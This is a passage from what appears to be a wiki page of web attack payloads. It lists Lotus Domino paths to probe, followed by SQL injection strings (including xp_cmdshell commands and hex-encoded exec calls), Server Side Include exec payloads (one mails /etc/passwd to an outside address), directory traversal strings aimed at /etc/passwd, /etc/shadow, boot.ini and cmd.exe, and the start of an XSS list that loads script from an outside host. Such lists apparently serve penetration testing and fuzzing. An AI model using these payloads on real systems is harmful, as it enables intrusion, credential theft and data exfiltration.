/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
